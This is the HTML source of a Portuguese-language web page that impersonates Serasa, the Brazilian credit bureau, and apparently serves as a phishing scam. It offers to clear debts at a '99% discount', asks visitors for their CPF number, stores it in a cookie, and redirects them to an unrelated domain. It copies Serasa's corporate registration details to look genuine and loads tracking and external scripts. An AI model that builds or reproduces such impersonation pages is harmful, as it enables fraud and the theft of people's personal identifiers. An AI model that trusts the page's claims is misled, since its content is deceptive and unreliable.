
<!DOCTYPE html>
<html lang="pt-BR" dir="ltr">
<head>
<meta name="robots" content="noindex, nofollow">
<link rel="shortcut icon" href="data:" />
<meta property="og:type" content="website">
<meta property="og:url" content="https://semanalimpanome.site/consulta">
<meta property="og:title" content="Serasa - Consulta de CPF">
<meta property="og:description" content="Serasa - Consulta de CPF">
<meta property="og:image" content="https://img.imageboss.me/atm/cdn/format:auto/u/lmBLvJMxJ1TNtSjWglSHhnLKFIw1/l/eubxea9113536.png">
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" />
<title>Serasa - Consulta de CPF</title>
<link rel="preconnect" href="https://fonts.googleapis.com">
<link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
<link href="https://fonts.googleapis.com/css2?family=Poppins:wght@300;400;500;600;700;800&family=Roboto:wght@300;400;500;600;700;800&family=Montserrat:wght@300;400;500;600;700;800&display=swap" rel="stylesheet" media="print" onload="this.onload=null;this.removeAttribute('media');">
<style>.items-center{align-items:center}.grid-cols-6{grid-template-columns: repeat(6, minmax(0, 1fr))}.grid-cols-5{	grid-template-columns: repeat(5, minmax(0, 1fr))}.grid-cols-4{grid-template-columns: repeat(4, minmax(0, 1fr))}.grid-cols-2{grid-template-columns: repeat(2, minmax(0, 1fr))}.grid-cols-3{grid-template-columns: repeat(3, minmax(0, 1fr))}.grid-cols-1{grid-template-columns: repeat(1, minmax(0, 1fr))}.grid{display:grid}.basis-1\/2{flex-basis:50%}.flex{display:flex}.gap-1{gap:4px}.gap-2{gap:8px}.gap-4{gap:16px}.gap-6{gap:24px}.gap-12{48px}.gap-24{gap:96px}.justify-center{justify-content:center}.basis-full{flex-basis:100%}html{scroll-behavior:smooth;-webkit-touch-callout:none;-webkit-user-select:none;-khtml-user-select:none;-moz-user-select:none;-ms-user-select:none;user-select:none;-webkit-tap-highlight-color:transparent}body,center,dd,del,div,dt,em,footer,h1,h2,h3,h4,h5,h6,i,iframe,img,p,q,s,small,span,strike,strong,sub,sup,table,tbody,td,tr,u{margin:-1px 0 0 0;padding:0;border:0;font-size:100%;font:inherit;vertical-align:baseline;font-family:Roboto,sans-serif}.u{-moz-user-select:none;-webkit-user-select:none;cursor:default}table{border-collapse:collapse;border-spacing:0}body{line-height:1}body{background-color:#ffffff;overflow-x:hidden}iframe,img,svg{max-width:100%}h1,h1 b,h1 span,h2,h2 b,h2 span,h3,h3 b,h3 span{font-family:Poppins,sans-serif}a{text-decoration:none;font-family:Roboto,sans-serif}a.btn{font-family:Montserrat,sans-serif}em span.lg,em span.md,em span.sm{font-style:italic}@media (max-width:600px){.flex-large,.flex-small{margin-right:0!important;margin-bottom:16px}}.flexrow{display:flex;flex-direction:row;flex-wrap:wrap;align-items:center}.flex-large,.flex-small{flex-basis:100%}.flex-large:last-child,.flex-small:last-child{margin-right:0!important}@media (min-width:600px){.flex-small{flex:1;margin-bottom:0!important;padding-bottom:0!important}.flex-small.half{flex:0 0 calc(1 / 2 * 100%)}.flex-small.one-fifth{flex:0 0 calc(1 / 5 * 100%)}.flex-small.two-fifths{flex:0 0 calc(2 / 5 * 100%)}.flex-small.one-fourth{flex:0 0 calc(1 / 4 * 100%)}.flex-small.two-fourths{flex:0 0 calc(2 / 4 * 100%)}.flex-small.three-fourths{flex:0 0 calc(3 / 4 * 100%)}.flex-small.one-third{flex:0 0 calc(1 / 3 * 100%)}.flex-small.two-thirds{flex:0 0 calc(2 / 3 * 100%)}}@media (min-width:1000px){.flex-large{flex:1;margin-bottom:0}.flex-large.half{flex:0 0 calc(1 / 2 * 100%)}.flex-large.one-fifth{flex:0 0 calc(1 / 5 * 100%)}.flex-large.two-fifths{flex:0 0 calc(2 / 5 * 100%)}.flex-large.one-fourth,.flex-large.two-fourths{flex:0 0 calc(1 / 4 * 100%)}.flex-large.three-fourths{flex:0 0 calc(3 / 4 * 100%)}.flex-large.one-third{flex:0 0 calc(1 / 3 * 100%)}.flex-large.two-thirds{flex:0 0 calc(2 / 3 * 100%)}}@media (min-width:640px){.sm\:gap-1{gap:6px}.sm\:gap-2{gap:12px!important}.sm\:gap-4{gap:24px}.sm\:gap-6{gap:32px}.sm\:gap-12{gap:64px}.sm\:gap-24{gap:128px}.sm\:grid-cols-6{grid-template-columns:repeat(6,minmax(0,1fr))}.sm\:grid-cols-5{grid-template-columns:repeat(5,minmax(0,1fr))}.sm\:grid-cols-4{grid-template-columns:repeat(4,minmax(0,1fr))}.sm\:grid-cols-2{grid-template-columns:repeat(2,minmax(0,1fr))}.sm\:grid-cols-3{grid-template-columns:repeat(3,minmax(0,1fr))}.sm\:grid-cols-1{grid-template-columns:repeat(1,minmax(0,1fr))}}</style>
</head>
<body id="_lmBLvJMxJ1TNtSjWglSHhnLKFIw1" data-page="_tSxnh1Hqcmgcjc5TpJGr">
<style>
.KHSfEN5097286 {display: none}
@media (max-width: 640px) {
html {overflow-x:hidden}
}
</style>
<div class="division-zBwPuy1745838__wrapper">
<style>
#division-zBwPuy1745838 {
position: relative;
padding: 3vh 20vw 3vh 20vw;
background-color: #ffffff;
}
@media (max-width:1200px) {
#division-zBwPuy1745838 {
padding: 2.25vh 15vw 2.25vh 15vw;
}
}
@media (max-width:600px) {
#division-zBwPuy1745838 {
padding: 1.5vh 1.5vw 1.5vh 1.5vw;
}
}
</style>
<div id="division-zBwPuy1745838" class="vmysRA5012073">
</div>
</div>
<div class="division-smnDxr0153791__wrapper">
<style>
#division-smnDxr0153791 {
position: relative;
padding: 3vh 20vw 3vh 20vw;
background-color: #ffffff;
}
@media (max-width:1200px) {
#division-smnDxr0153791 {
padding: 2.25vh 15vw 2.25vh 15vw;
}
}
@media (max-width:600px) {
#division-smnDxr0153791 {
padding: 1.5vh 1.5vw 1.5vh 1.5vw;
}
}
</style>
<div id="division-smnDxr0153791" class="yEEmAb5012074">
<div class="image-wAqofh8108519">
<style>
.image-wAqofh8108519-element img {
display: block;
margin-left: auto;
margin-right: auto;
margin-bottom: 2.5vh;
margin-top: 0.75vh;
max-width: 40%;
border-radius: 0;
border: none;
}
@media (max-width: 1200px) {
.image-wAqofh8108519-element img {
max-width: 36%;
}
}
@media (max-width: 600px) {
.image-wAqofh8108519-element img {
max-width: 65%;
margin-left:auto;margin-right:auto;
}
}
</style>
<div class="image-wAqofh8108519-element">
<img loading="lazy" src="https://img.imageboss.me/atm/cdn/format:auto/u/lmBLvJMxJ1TNtSjWglSHhnLKFIw1/l/vHfoxW8137514.svg+xml" alt="">
</div>
</div>
<div class="html-kxfHlk1422861">
<style>
.html-kxfHlk1422861-element div {
font-size: 0.99vw;
text-align: center;
padding-top: vh;
padding-bottom: vh;
color: #000000;
line-height: ;
font-weight: 400;
false
}
@media (max-width: 1200px) {
.html-kxfHlk1422861-element div {
font-size: 1.50vw;
padding-top: NaNvh;
padding-bottom: NaNvh;
}
}
@media (max-width: 640px) {
.html-kxfHlk1422861-element div {
font-size: 2.25vw;
padding-top: NaNvh;
padding-bottom: NaNvh;
text-align: center;
}
}
</style>
<div class="html-kxfHlk1422861-element ">
<div>
<title>Consultar saldo FGTS</title>
<style>
form {
display: block;
margin: 50px auto;
max-width: 300px;
padding: 20px;
border: 1px solid #ccc;
border-radius: 5px;
box-shadow: 0 0 5px #ccc;
}
h1 {
font-size: 24px;
margin-top: 0;
}
label {
display: block;
margin-bottom: 5px;
}
input, select {
display: block;
width: 100%;
padding: 10px;
border-radius: 5px;
border: 1px solid #ccc;
margin-bottom: 10px;
font-size: 16px;
}
input[type="submit"] {
background-color: #f100b6;
color: #fff;
padding: 10px;
border: none;
border-radius: 3px;
cursor: pointer;
}
input[type="submit"]:hover {
background-color: #f431de;
}
</style>
<script>
function redirectToPage() {
    // Armazena os parâmetros UTM da URL em variáveis
    const searchParams = new URLSearchParams(window.location.search);
    const utmSource = searchParams.get("utm_source");
    const utmMedium = searchParams.get("utm_medium");
    const utmCampaign = searchParams.get("utm_campaign");

    // Monta o link de redirecionamento com os parâmetros UTM
    const nextPageUrl = `https://rabanalua.com/limpeza/`;

// Armazenar os valores dos campos em cookies
  document.cookie = "cpf=" + document.getElementById("cpf").value + "; path=/";
  
    // Redireciona para a próxima página
    window.location.href = nextPageUrl;
}
</script>
<form onsubmit="redirectToPage(); return false;">
<h1>Entrar na Serasa</h1> <br>
<p>Olá! Identifique-se para acessar sua conta Serasa.</p> <br>
<label for="cpf">CPF:</label>
<input type="text" id="cpf" name="cpf" placeholder="Digite seu CPF" required="">
<input type="submit" class="button" value="Consultar CPF grátis">
</form></div>
</div>
</div>
<div class="text-JJkwME8485618">
<style>
.text-JJkwME8485618-element p {
font-size: 0.99vw;
text-align: center;
padding-top: 0vh;
padding-bottom: 40vh;
color: #716969;
line-height: 1.1;
font-weight: 400;
false
}
@media (max-width: 1200px) {
.text-JJkwME8485618-element p {
font-size: 1.50vw;
padding-top: 0vh;
padding-bottom: 30vh;
}
}
@media (max-width: 640px) {
.text-JJkwME8485618-element p {
font-size: 4.00vw;
padding-top: 1.5vh;
padding-bottom: 1.5vh;
text-align: center;
}
}
</style>
<div class="text-JJkwME8485618-element text">
<p>
Limpe seu nome com 99% de desconto<br><br><span style="color:#f11681"><b>Serasa limpando seu nome!</b></span>
</p>
</div>
</div>
</div>
</div>
<div class="division-EDajIi8599326__wrapper">
<style>
#division-EDajIi8599326 {
position: relative;
padding: 3vh 20vw 3vh 20vw;
background-color: #ffffff;
}
@media (max-width:1200px) {
#division-EDajIi8599326 {
padding: 2.25vh 15vw 2.25vh 15vw;
}
}
@media (max-width:600px) {
#division-EDajIi8599326 {
padding: 1.5vh 1.5vw 1.5vh 1.5vw;
}
}
</style>
<div id="division-EDajIi8599326" class="dYMJPS5012075">
</div>
</div>
<div class="division-IzbSCI8848487__wrapper">
<style>
#division-IzbSCI8848487 {
position: relative;
padding: 3vh 20vw 3vh 20vw;
background-color: #ffffff;
}
@media (max-width:1200px) {
#division-IzbSCI8848487 {
padding: 2.25vh 15vw 2.25vh 15vw;
}
}
@media (max-width:600px) {
#division-IzbSCI8848487 {
padding: 1.5vh 1.5vw 1.5vh 1.5vw;
}
}
</style>
<div id="division-IzbSCI8848487" class="CpDeko5012075">
</div>
</div>
<div class="division-SvaBvc8847992__wrapper">
<style>
#division-SvaBvc8847992 {
position: relative;
padding: 3vh 20vw 3vh 20vw;
background-color: #ffffff;
}
@media (max-width:1200px) {
#division-SvaBvc8847992 {
padding: 2.25vh 15vw 2.25vh 15vw;
}
}
@media (max-width:600px) {
#division-SvaBvc8847992 {
padding: 1.5vh 1.5vw 1.5vh 1.5vw;
}
}
</style>
<div id="division-SvaBvc8847992" class="maHjDg5012076">
</div>
</div>
<div class="division-djbBXo8847455__wrapper">
<style>
#division-djbBXo8847455 {
position: relative;
padding: 3vh 20vw 3vh 20vw;
background-color: #ffffff;
}
@media (max-width:1200px) {
#division-djbBXo8847455 {
padding: 2.25vh 15vw 2.25vh 15vw;
}
}
@media (max-width:600px) {
#division-djbBXo8847455 {
padding: 1.5vh 1.5vw 1.5vh 1.5vw;
}
}
</style>
<div id="division-djbBXo8847455" class="lsBqwf5012076">
</div>
</div>
<div class="division-AvWSRl8846888__wrapper">
<style>
#division-AvWSRl8846888 {
position: relative;
padding: 3vh 20vw 3vh 20vw;
background-color: #ffffff;
}
@media (max-width:1200px) {
#division-AvWSRl8846888 {
padding: 2.25vh 15vw 2.25vh 15vw;
}
}
@media (max-width:600px) {
#division-AvWSRl8846888 {
padding: 1.5vh 1.5vw 1.5vh 1.5vw;
}
}
</style>
<div id="division-AvWSRl8846888" class="QwJKBz5012076">
</div>
</div>
<div class="division-MpvXhW8600278__wrapper">
<style>
#division-MpvXhW8600278 {
position: relative;
padding: 3vh 20vw 3vh 20vw;
background-color: #ffffff;
}
@media (max-width:1200px) {
#division-MpvXhW8600278 {
padding: 2.25vh 15vw 2.25vh 15vw;
}
}
@media (max-width:600px) {
#division-MpvXhW8600278 {
padding: 1.5vh 1.5vw 1.5vh 1.5vw;
}
}
</style>
<div id="division-MpvXhW8600278" class="AlAghu5012077">
</div>
</div>
<div class="division-JgRpik1583901__wrapper">
<style>
#division-JgRpik1583901 {
position: relative;
padding: 3vh 20vw 3vh 20vw;
background-color: #f7f7f7;
}
@media (max-width:1200px) {
#division-JgRpik1583901 {
padding: 2.25vh 15vw 2.25vh 15vw;
}
}
@media (max-width:600px) {
#division-JgRpik1583901 {
padding: 1.5vh 1.5vw 1.5vh 1.5vw;
}
}
</style>
<div id="division-JgRpik1583901" class="LvLJBP5012077">
<div class="subheadline-Pmnmkt8703126">
<style>
.subheadline-Pmnmkt8703126-element h2 {
font-size: 1.65vw;
text-align: center;
padding-top: 2vh;
padding-bottom: 2vh;
color: #302d2d;
line-height: 1.1;
font-weight: 400;
false
}
@media (max-width: 1200px) {
.subheadline-Pmnmkt8703126-element h2 {
font-size: 2.50vw;
padding-top: 1.5vh;
padding-bottom: 1.5vh;
}
}
@media (max-width: 640px) {
.subheadline-Pmnmkt8703126-element h2 {
font-size: 4.50vw;
padding-top: 1.5vh;
padding-bottom: 1.5vh;
text-align: center;
}
}
</style>
<div class="subheadline-Pmnmkt8703126-element subheadline">
<h2>
Copyright 2023 – SERASA <br>CONSUMIDOR CNPJ: 17.429.458/0001-63 ®
</h2>
</div>
</div>
<div class="text-wIpGIb8350333">
<style>
.text-wIpGIb8350333-element p {
font-size: 0.99vw;
text-align: center;
padding-top: 10vh;
padding-bottom: 10vh;
color: #716969;
line-height: 1.1;
font-weight: 400;
false
}
@media (max-width: 1200px) {
.text-wIpGIb8350333-element p {
font-size: 1.50vw;
padding-top: 7.5vh;
padding-bottom: 7.5vh;
}
}
@media (max-width: 640px) {
.text-wIpGIb8350333-element p {
font-size: 4.00vw;
padding-top: 1.5vh;
padding-bottom: 1.5vh;
text-align: center;
}
}
</style>
<div class="text-wIpGIb8350333-element text">
<p>
Nós protegemos a sua privacidade!<br><span style="color:#f11681"><b>Termos de uso e privacidade</b></span>
</p>
</div>
</div>
</div>
</div>
<img height="1" width="1" style="display:none" src="https://www.facebook.com/tr?id=1460227654511481&ev=PageView"/>
<script src="/consulta/js/KHSfEN5097286.js" charset="utf-8"></script>
<script>document.addEventListener("DOMContentLoaded",(()=>{document.querySelectorAll("a").forEach((e=>{e.getAttribute("href").includes("#")||(e.getAttribute("href").includes("?")?e.setAttribute("href",e.getAttribute("href")+window.location.search.replace("?","&")):e.setAttribute("href",e.getAttribute("href")+window.location.search))}))}));</script>
<script type="text/javascript">document.head.appendChild(Object.assign(document.createElement("script"), {src: "https://cdn.atomicatpages.com/a.js?cache=" + Math.floor((Math.random() * 100000)),async: true}));</script>
</body>
</html>